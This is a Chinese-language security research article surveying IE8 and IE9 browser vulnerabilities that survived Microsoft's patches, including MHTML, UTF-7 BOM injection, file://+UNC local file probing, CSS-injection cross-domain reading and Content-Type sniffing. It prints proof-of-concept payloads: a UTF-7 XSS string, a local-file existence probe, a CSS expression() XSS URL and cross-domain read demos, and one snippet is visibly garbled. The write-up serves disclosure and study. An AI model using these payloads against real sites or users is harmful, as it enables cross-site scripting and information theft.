<span id="7ztzv"></span>
<sub id="7ztzv"></sub>

<span id="7ztzv"></span><form id="7ztzv"></form>

<span id="7ztzv"></span>

        <address id="7ztzv"></address>

            關于IE的那些雞肋

            
            by SuperHei_at_www.80vul.com
            
            
               MS的補丁風格一直都是“縫縫補補”的,從來不“斬盡殺絕”,這個也造就了,很多的
            IE漏洞逐步實現“雞屁股”-->“雞肋”-->“雞骨頭”的神奇歷程!本文就以這個過程來對
            一些具體IE漏洞的進行簡單跟蹤,及目前的狀態作一些總結:
            
            [注:就MS打算拋棄IE6/7等低版本的IE,另外IE10還是測試開發階段,所以本文測試是在
            IE8和IE9上]
            
            一、mhtml的故事
            
            “MHTML vulnerability”無疑是去年最大的亮點,在2011年1月的Ph4nt0m Webzine 0x05上
            由d4rkwind《IE下MHTML協議帶來的跨域危害》一文拉開序幕,在Ph4nt0m Webzine 0x05發布
            的同時,我在FD上發布了通過學習《IE下MHTML協議帶來的跨域危害》后寫的關于mhtml利用
            的文章《Hacking with mhtml protocol handler》,緊接著MS發布了漏洞公告及臨時處理辦
            法:Microsoft Security Advisory (2501696),一直沒有推出正式的補丁直到2011年4月的
            MS11-026,但是故事還在繼續...。MS11-26沒有處理好<embed>標簽調用mhtml帶來的安全問
            題,只到2011年6月的MS11-037被補丁。似乎一切都很完美了,不過很遺憾的是悲劇還在延續。
            
            我在2011年8月測試發現安裝MS11-057補丁后在某些系統(MS證實XP和Server 2003)上
            MHTML vulnerability再次出現,這個問題于9月發布在FD上《MHTML Mime-Formatted 
            Request Vulnerability Again》而這個問題最終在12月的補丁了補丁(具體不詳:()
            
            目前看來mhtml完全變為了沒有肉絲的雞骨頭了。
            
            二、utf7 BOM
            
            這個是去年IE猥瑣流問題里的又一亮點,這個延續了mhtml導致的"100+個xss"的傳奇。這個
            問題起源于Gareth Heyes于2010年寫的《XSS Lightsabre techniques》一文里,在2011年在
            和Mario Heiderich一次交流中得知這個utf7 dom的問題,我們先回顧一下基礎知識"什么是BOM?":
            
            BOM(byte-order mark),即字節順序標記,它是插入到以UTF-8、UTF16或UTF-32編碼
            Unicode文件開頭的特殊標記,用來識別Unicode文件的編碼類型。
            
            對于utf7來說BOM字符為:“+/v8、 +/v9、 +/v+、 +/v/”,因為BOM字符要求位于文件開
            頭,所以它的優先等級應該在html文件設置charset的前面如<meta>。但是在一些瀏覽器如
            IE在處理BOM時,它的優先等級先于HTTP Content-Type header,由于UTF-7編碼的特殊性,
            導致通過注射BOM來控制編碼,從而利用utf7編碼來繞過一些安全過濾。主要表現在xss過濾
            繞過上。具體詳見:《about utf7-BOM string injection》一文。
            
            對于這個問題MS好像一直都沒有公開談論過,于是d4rkwind在2011年8月的一天再次測試是發
            現MS做了一定的“fix”:HTTP Content-Type header里的charset優先于BOM!如下代碼:
            
            <?php
            header('Content-Type:text/html;charset=utf-8');
            ?>
            +/v8/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
            
            當用IE8、IE9訪問以上代碼時,編碼為utf8而不是utf7,所以上面的js代碼沒有執行。但是
            我們測試發現在IE8下當我們轉換編碼或瀏覽器窗口前進后退動作到這個頁面時,我們的js將
            被執行,也就是編碼轉為utf7,那么我們用代碼實現一下:
            
            < script>
            function bom() <iframe src
            
            function back() {
              w.location.;
            }
            </script>
            <input type=submit value="go" onclick="bom()">
            
            
            http://192.168.1.100/ie/utf7/back.htm代碼如下:
            
            < script>
            setTimeout('history.back()',100);
            </script>
            
            另外我們也可以這樣實現:
            
            <meta http-equiv="refresh" content="2;URL=http://192.168.1.100/ie/utf7/back.htm"/> 
            <iframe src="http://192.168.1.100/ie/utf7/bom.php"></iframe>
            
            這個方法在IE9下不行。
            
              
            另外對于使用style、link標簽引用風格文件及HTTP Content-Type header沒有指定
            charset的情況下,IE8、9仍然用BOM優先。
            
            三、file://+UNC
            
            同樣是在2011年1月的Ph4nt0m Webzine 0x05上有我寫的一篇文章《走向本地的邪惡之路》里
            面就是通過iframe通過file://+UNC調用本地xss來實現讀取本地文件。也就是說在當時的環
            境iframe使用file://+UNC是合法的。即使Ph4nt0m Webzine 0x05發布后,MS一直也沒有對應
            的防御措施,只到MS11-057,而這個補丁推出主要是處理“cookiejacking”的問題。一切來
            得那么意外!但是MS的補丁風格從來都不是“斬盡殺絕”的!除了iframe外其他的標簽還是
            通過file://+UNC加載本地文件的,如:
            
            <img src="file:////127.0.0.1/c$/ie9.PNG" ></img>
            <script src="file:////127.0.0.1/c$/ie.js" ></script>
            
            在wooyun上曾經發布一個利用< script>調用本地文件,然后通過錯誤來判斷的本地文件存在
            與否的公告。那么我繼續測試一下:
            
            a.htm
            <script>
            window.onerror=function(){
            alert('文件存在');
            return true;
            }
            </script>
            <script src ="file:////127.0.0.1\c$\windows\system32\cmd.exe"></script>
            
            b.htm
            <script>
            window.onerror=function(){
            alert('文件存在');
            return true;
            }
            </script>
            <script src ="file:////127.0.0.1\c$\windows\system32\aaa.exe"></script>
            
            訪問a.htm時會提示文件存在,訪問b.htm則不會彈筐。一個完美的信息泄漏的漏洞!:)
            
            另外對于第三方的瀏覽器來說我們仍然可以利用iframe通過file://+UNC調用本地html文件,
            也就是說“走向本地的邪惡之路”在IE的第3方瀏覽器里還可以使用,當然在IE8、9里“信任
            站點”也是可以使用的。
            
            
            四、css注射跨域
            
            早在2009年大牛Chris Evans在他的blog里《Generic cross-browser cross-domain theft》
            就通過插入css字符來達到跨域讀取敏感信息的目的,但是當時并沒有提出"CSS String 
            Injection"這個概念只到paper《Protecting Browsers from Cross-Origin CSS Attacks》
            的發布。當時各大瀏覽器都基本沒有限制加載css文件的Content-Type,及DOM對
            document.styleSheets讀取域的限制,所以基本都受到影響。我當時在測試的時候意外發現
            了ie8的一個新的漏洞:《IE8 Css Cross-Domain Information Disclosure 
            Vulnerability》IE8允許DOM通過document.styleSheets(0).imports(0).cssText讀取遠程的
            文件。這些問題一起MS-071得到補丁,當然MS的補丁都會給你留下一絲希望,不會“趕盡殺
            絕”的 :)。MS-071的補丁限制了在加載第3方css文件時的Content-Type,也就是說你如果使
            用<LINK REL="stylesheet">或<style> @import url("");</style>加載遠程的css時,不讓
            加載html等非css文件。
            
            上面分析得到MS-071后的結果:
            
            1、對于遠程文件來說,可以控制加載頁面的Content-Type,那么我們還可以實現跨域讀取。
            2、對于同一域來說,沒有任何限制。
            
            對于1來說我們可以看看以下demo:
            
            <html>
            <head>
            <style>
            @import url("http://www.80vul.com/css.php?c=text/css");
            </style>
            <script>
            function loaded() {
              alert(document.styleSheets(0).imports(0).cssText);
            }
            </script>
            </head>
            <body onload="loaded()">
            </body>
            </html>
            
            css.php
            <?php
            //header("Content-Type: text/css");
            header("Content-type: ".$_GET['c']);
            ?>
            body {
            font-family:
            'x';
            }
            
            當然對于header("Content-type: ".$_GET['c']);這樣的代碼是比較“理想”的情況,在現
            實攻擊里我們可以通過“HTTP Response Splitting”來實現控制Content-Type的目的。
            
            對于第2種情況,很多人包括MS官方都不認為有什么可利用的,因為它的前提就是同域,不存
            在跨域的概念。但是萬事都有例外,我們看下如下代碼:
            
            //demovul.php
            <LINK REL="stylesheet" HREF="./<?=$_GET['css']?>">
            
            可以通過提交demovul.php?css=aa.css來任意調用css,那么因為這個本事就是在同一個域,
            所以我們只要找到一個可以注射css字符的點,然后提交個demovul.php?css=就可以實現插入
            任意的css語句了,比如在ie下可以使用expression()來實現xss,如:
            
            http://192.168.12.102/ie/demovul.php?css=cssinj.php?a='}body{font-family:'x';xss:expression((window.rrr==1)?'':eval('rrr=1;eval(alert(111));'));font-family:'';{'
            
            
            五、本地跨域
            
            對于打開本地HTML文件是,IE一直都是“嚴防死守”的,比如IE打開本地文件html文件時,
            如果有js會提示并要用戶允許后才可以執行。而悲劇的是這些都只是基于IE這個“外殼”上
            的防御,但更加多的第3方基于IE“內核”[Trident]的瀏覽器,是沒有提示的。另外
            Trident在本地執行WSH是有安全提示的,但是在請求http域時沒有任何防御,如下代碼:
            
            <script> 
            var request = false;
                    if(window.XMLHttpRequest) {
                        request = new XMLHttpRequest();
                        if(request.overrideMimeType) {
                            request.overrideMimeType('text/xml');
                        }
                    } else if(window.ActiveXObject) {
                        var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 
                        'Microsoft.XMLHTTP', 
                        'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 
                        'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
                        for(var i=0; i<versions.length; i++) {
                            try {
                                request = new ActiveXObject(versions[i]);
                            } catch(e) {}
                        }
                    }
                    
            xmlhttp=request;
             
            xmlhttp.open("GET", "http://www.80vul.com/", false);
            xmlhttp.send(null);
            var ret = xmlhttp.responseText;
             
            alert(ret);
            </script>
            
            在本期文章《Android應用安全之開發環境帶來的危險》就利用了Eclipse自帶瀏覽器的本地
            跨任意http域的問題。
            
            六、window.onerror跨域信息泄漏漏洞
            
            這個是一個名副其實的“雞肋”漏洞,這個問題是Chris Evans大牛在blog:《Minor leak, 
            major headache》里提到的,到目前為止,這個雞肋還可以正常工作 :),測試代碼如下:
            
            <html>
            <body>
            <script>
            window.onerror = function(msg, url, line) {
                if (onerror.num++ < onerror.max) {
                    alert("ERROR: " + msg + "\n" + url + ":" + line);
                    return true;
                }
            }
            onerror.max = 3;
            onerror.num = 0;
            </script>
            <script src="http://www.80vul.com/test/error.txt">
            </script>
            </body>
            </html>
            
            七、被忽視的Content-Type
            
            在HIT2011上Yosuke HASEGAWA在《Make A Contract with IE and Become a XSS Girl!》的
            演講里,提到了IE在處理沒有在注冊表里注冊過的Content-Type類型時,會根據請求的URL里
            的文件后綴來判斷。如下:
            
            http://www.taobao.com/expressway/index.php?id=mytaobao&container=test
            
            當我們使用IE8訪問上面url是會提示下載,而訪問下面url時,會解析html。
            
            http://www.taobao.com/expressway/index.php/x.html?id=mytaobao&container=test
            
            可惜這個方法不適用于IE9。
            
            后話及參考:
            
            從上面的漏洞來看,IE9在一些猥瑣流安全上有了比較大的進步,但是還是遺留了一些
            “雞肋”,而在一定的場景下,也完全有可能變為“雞屁股”!看來MS的安全部門的人員都
            是上帝的信徒!
            至于本文里提到的那些文檔,這里就沒有給出具體的參考鏈接了,有需求的可以自己搜索或
            者在我的blog:http://hi.baidu.com/hi_heige/上尋找。本文很多都是基于記憶來總結的,
            如有不妥當或者錯誤的地方請一定告知,謝謝各位看官及文章里提及的那些文檔的作者們!
            
            -EOF-
            
            <span id="7ztzv"></span>
            <sub id="7ztzv"></sub>

            <span id="7ztzv"></span><form id="7ztzv"></form>

            <span id="7ztzv"></span>

                  <address id="7ztzv"></address>

                      亚洲欧美在线